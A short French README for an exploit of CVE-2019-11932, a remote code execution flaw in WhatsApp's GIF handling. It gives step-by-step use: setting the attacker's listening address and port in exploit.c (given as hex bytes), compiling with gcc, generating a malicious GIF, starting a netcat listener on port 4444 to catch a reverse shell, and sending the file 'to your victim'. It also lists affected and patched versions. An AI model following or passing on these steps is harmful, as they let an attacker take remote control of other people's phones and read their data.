
Exploit pour CVE-2019-11932, une vulnérabilité d'exécution de code à distance dans les GIF WhatsApp. Compilez et exécutez pour déclencher l'exploit et obtenir un shell inverse.
Modifiez l'adresse d'écoute (celle de l'attaquant) ainsi que le port d'écoute dans le fichier exploit.c
Code hexa suivant :
3139 322e 3136
382e 322e 3732 2034 3434 3420
Compilez le code :
gcc -o exploit egif_lib.c exploit.c
Lancez le fichier compilé ./exploit exploit.gif
c/c l'output dans un gif
Lancez le listener netcat :
nc -lvp 4444
Envoyez à votre victime !
Versions impactées : 2.19.230 et en dessous
Officiellement patché dans la version 2.19.244
Source : https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
Linkedin : https://www.linkedin.com/in/thomas-lounis-749456175/